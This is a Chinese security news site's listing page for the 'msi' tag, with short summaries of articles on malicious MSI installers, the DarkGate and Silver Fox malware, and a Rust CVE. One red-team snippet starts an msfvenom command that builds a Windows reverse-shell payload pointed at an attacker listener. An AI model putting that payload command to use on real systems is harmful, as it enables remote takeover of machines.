msi - 第 4 | CN-SEC 中文网

安全新闻

黑客利用恶意 VPN 安装程序攻击我国用户

近期攻击我国用户的行动有点多啊！中文用户成为了一个新的威胁活动团伙Void Arachne的目标。该团伙利用针对VPN的恶意Windows Installer（MSI）文件，来传播一种名为Winos ...

06月20日42 views评论

阅读全文

安全新闻

新的 SSLoad 恶意软件与劫持整个网络域的工具相结合

FROZEN#SHADOW 被发现采用了一种新的攻击活动，该活动利用 SSLoad 恶意软件进行操作，并利用 Cobalt Strike Implants 来控制和接管整个网络。此外，威胁分子还使用S...

05月29日106 views评论

阅读全文

安全新闻

黑客利用 Windows SmartScreen 漏洞投放 DarkGate 恶意软件

关键词恶意软件DarkGate 恶意软件操作发起的新一波攻击，利用现已修复的 Windows Defender SmartScreen 漏洞来绕过安全检查，并自动安装虚假软件安装程序。SmartScr...

04月22日18 views评论

阅读全文

安全文章

红队战术 - WMI + MSI 横向移动

执行在 MSI（Microsoft 安装程序包）中生成恶意负载：攻击者@localmsfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LP...

04月19日11 views评论

阅读全文

安全漏洞

[漏洞复现] Rust命令注入漏洞 CVE-2024-24576

本人非原创漏洞作者，文章仅作为知识分享用一切直接或间接由于本文所造成的后果与本人无关如有侵权，联系删除产品简介Rust 是 Mozilla 的一个新的编程语言，由 web 语言的领军人物 Brenda...

04月12日92 views评论

阅读全文

安全新闻

最流行的恶意软件行为和技术

对100,000 多个 Windows 恶意软件样本的分析揭示了恶意软件开发人员用来成功逃避防御、提升权限、执行恶意软件并确保其持久性的最流行技术。恶意软件策略和技术分析的恶意软件样本通常通过恶意电子...

03月22日18 views评论

阅读全文

安全新闻

黑客利用Windows SmartScreen漏洞投放DarkGate恶意软件

DarkGate 恶意软件发起的新一波攻击利用现已修复的 Windows Defender SmartScreen 漏洞来绕过安全检查并自动安装虚假软件安装程序。SmartScreen 是一项 Win...

03月22日17 views评论

阅读全文

安全新闻

DarkGate战役利用Windows智能屏幕绕过缺陷

在1月中旬的观察中，DarkGate恶意软件活动被注意到利用微软Windows最近修补的安全漏洞。这种零日漏洞利用欺骗性软件安装程序来诱骗毫无戒心的用户。更多细节趋势科技报告称，用户被包含Google...

03月18日14 views评论

阅读全文

安全新闻

黑客利用谷歌云运行服务传播三大银行木马

更多全球网络安全资讯尽在邑安全近期有安全研究人员警告称，黑客滥用谷歌云运行服务传播大量银行木马，如Astaroth、Mekotio和Ousaban。谷歌云运行服务无需管理基础设施或进行扩展，允许用...

02月23日23 views评论

阅读全文

安全文章

MSI武器化学习

您的转发就是我更新的动力。简介MSI文件是Windows Installer的数据包，它实际上是一个数据库，包含安装一种产品所需要的信息和在很多安装情形下安装（和卸载）程序所需的指令和数据。MSI文件...

01月30日89 views评论

阅读全文

安全新闻

银狐黑吃黑：利用伪造 MSI 安装包攻击黑产从业者

1概述来自银狐的攻击愈演愈烈。微步情报局近期监测捕获了大量被捆绑木马的MSI格式的常用软件安装包，其中包括WPS、WhatsApp、火绒安全软件和ToDesk等。这些安装包中均被捆绑了木马，导致大量用...

01月05日275 views评论

阅读全文

安全新闻

微信群聊再现银狐病毒新变种，针对财务人员钓鱼攻击

近日，火绒收到多名用户反馈，通信工具遭遇远程控制。经火绒安全工程师分析确认，该后门病毒为“银狐”木马的新变种，具有更强的对抗性和隐蔽性。该类病毒通常以企事业的管理人员、财务人员、销售人员等为主要目标，...

12月26日165 views评论

阅读全文

在线咨询

微信